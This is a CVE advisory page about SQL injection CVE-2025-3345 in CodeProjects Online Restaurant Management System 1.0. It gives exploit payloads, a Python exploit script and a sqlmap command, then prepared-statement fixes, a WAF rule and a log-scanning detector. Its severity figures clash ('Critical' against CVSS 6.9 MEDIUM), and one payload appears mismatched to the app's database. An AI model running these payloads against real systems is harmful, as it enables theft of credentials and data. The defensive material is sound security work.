CodeProjects Online Restaurant Management System 1.0, SQL Injection, CVE-2025-3345 (Critical)

How CVE-2025-3345 Works

The vulnerability exists in the `/admin/combo.php` file of CodeProjects Online Restaurant Management System 1.0. The `del` parameter is not properly sanitized before it is used in a SQL query, allowing attackers to inject malicious SQL. When a crafted value is sent in an HTTP request, the backend database executes unintended commands, potentially leading to unauthorized data access, modification, or deletion. The attack is remotely exploitable without authentication, making it critical. Exploits leveraging this flaw have been publicly disclosed, increasing the risk of widespread abuse.

DailyCVE Form

Platform: CodeProjects ORMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025

What Undercode Says:

Exploitation

1. Payload Example:

GET /admin/combo.php?del=1' UNION SELECT username,password FROM users-- HTTP/1.1

2. Automated Exploit (Python):

import requests
target = "http://target.com/admin/combo.php"
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
response = requests.get(target, params={"del": payload})
print(response.text)

3. SQLMap Command:

sqlmap -u "http://target.com/admin/combo.php?del=1" --risk=3 --level=5

Protection

1. Input Sanitization:

// Escaping only protects a value that is enclosed in quotes inside the SQL text;
// it does nothing for an unquoted numeric id such as `WHERE id = $del`, so prefer step 2.
$del = mysqli_real_escape_string($conn, $_GET['del']);

2. Prepared Statements:

$stmt = $conn->prepare("DELETE FROM combos WHERE id = ?");
$stmt->bind_param("i", $_GET['del']); // "i" sends the value as an integer; the SQL text is fixed before the value is bound
$stmt->execute();

3. WAF Rules:

location /admin/ {
    modsecurity on;
    # Inspect only the "del" query argument (ARGS_GET:del) with libinjection's SQLi detector;
    # the original form `SecRule ARGS_GET "del"` would have matched the literal text "del" in any argument.
    modsecurity_rules 'SecRule ARGS_GET:del "@detectSQLi" "id:1000,phase:2,deny,status:403,msg:\'SQLi attempt on del\'"';
}

4. Patch Verification:

grep -r "mysqli_real_escape_string" /var/www/html/admin/
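Beyond checking that the code was patched, a defender will want to know whether the endpoint was already hit. The following added example (not from the original page or the CodeProjects project) scans combined-format web-server log lines for requests to `/admin/combo.php` whose `del` value is anything other than a plain numeric id, which is exactly what the vulnerable code would have passed straight into SQL. The log lines, the path and the parameter name are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format) for the demonstration.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Apr/2025:10:01:02 +0000] "GET /admin/combo.php?del=12 HTTP/1.1" 302 0
203.0.113.10 - - [30/Apr/2025:10:01:05 +0000] "GET /admin/combo.php?del=1%27%20OR%201%3D1-- HTTP/1.1" 200 5120
198.51.100.7 - - [30/Apr/2025:10:02:00 +0000] "GET /admin/index.php HTTP/1.1" 200 2048
198.51.100.7 - - [30/Apr/2025:10:02:09 +0000] "GET /admin/combo.php?del=1%20UNION%20SELECT%20username%2Cpassword%20FROM%20users HTTP/1.1" 200 7311
"""

# ip, timestamp, method, request-URI and status code of one combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# The only legitimate shape of the `del` parameter: a short decimal id.
NUMERIC_ID = re.compile(r"^\d{1,10}$")


def suspicious_del_requests(log_text, path="/admin/combo.php", param="del"):
    """Return (ip, timestamp, decoded value, status) for every request to `path`
    whose `param` is not a plain numeric id, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("uri"))
        if parts.path != path:
            continue
        # parse_qs percent-decodes once; a second pass catches double-encoded
        # values, and a genuine numeric id is unchanged by it.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            decoded = unquote_plus(value)
            if not NUMERIC_ID.match(decoded):
                hits.append((m.group("ip"), m.group("ts"), decoded, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, ts, value, status in suspicious_del_requests(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} del={value!r}")
```

A 200 response with a larger body on one of these hits, compared with the normal redirect after a delete, is the first thing to look at when deciding whether the injection actually returned data.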

Analytics

  • CVSS 4.0: 6.9 (MEDIUM)
  • Attack Vector: Network
  • Privileges Required: None
  • Exploitability: High (Public PoC)
  • Mitigation Difficulty: Low (Code Fix)

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
